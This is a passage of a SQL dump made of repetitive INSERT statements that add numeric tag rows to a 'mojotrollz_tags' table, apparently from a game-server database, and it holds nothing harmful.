INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175725, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175726, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175727, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175727, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175729, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175730, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175730, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175731, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175732, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175733, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175734, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175735, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175736, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175737, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175737, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175737, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175737, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175738, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175738, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175739, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175740, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175741, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175742, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175743, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175744, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175745, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175746, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175747, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175748, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175749, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175750, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175751, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175752, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175753, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175753, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175754, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175756, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175757, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175758, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175759, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175760, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175761, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175762, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175762, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175762, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175762, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175763, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175764, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175765, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175766, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175767, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175771, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175771, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175772, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175772, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175773, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175773, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175774, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175774, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175775, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175775, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175776, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175776, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175777, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175777, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175778, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175778, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175779, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175779, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175780, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175780, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175781, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175781, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175784, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175785, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175786, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175787, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175788, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175795, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175796, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175796, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175796, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175796, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175797, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175798, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175799, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175800, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175801, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175802, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175811, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175824, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175824, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175824, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175824, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175825, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175825, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175825, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175825, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175844, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175845, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175846, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175847, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175848, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175849, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175850, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175851, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175852, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175853, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175854, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175855, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175856, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175857, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175857, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175857, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175857, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175858, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175858, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175858, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175858, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175885, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175886, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175888, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175889, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175890, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175891, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175892, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175893, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175894, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175924, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175925, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175926, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175927, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175928, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175929, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175930, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175931, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175932, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175933, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175944, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175946, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175947, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175948, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175949, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175950, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175965, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175966, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175966, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175966, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175966, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175967, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175967, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175967, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175967, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175968, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175968, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175968, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175968, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175969, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175969, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175969, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175969, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175970, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176004, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176080, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176081, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176082, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176083, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176084, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176085, 2, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176089, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176090, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176091, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176092, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176094, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176095, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176096, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176097, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176112, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176112, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176112, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176112, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176113, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176115, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176116, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176117, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176142, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176143, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176145, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176146, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176147, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176148, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176150, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176151, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176152, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176157, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176158, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176159, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176160, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176161, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176163, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176164, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176165, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176166, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176184, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176186, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176187, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176188, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176189, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176190, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176191, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176192, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176194, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176194, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176194, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176194, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176195, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176196, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176197, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176198, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176200, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176201, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176202, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176203, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176204, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176206, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176207, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176208, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176209, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176210, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176211, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176211, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176211, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176211, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176213, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176214, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176215, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176215, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176215, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176215, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176216, 2, 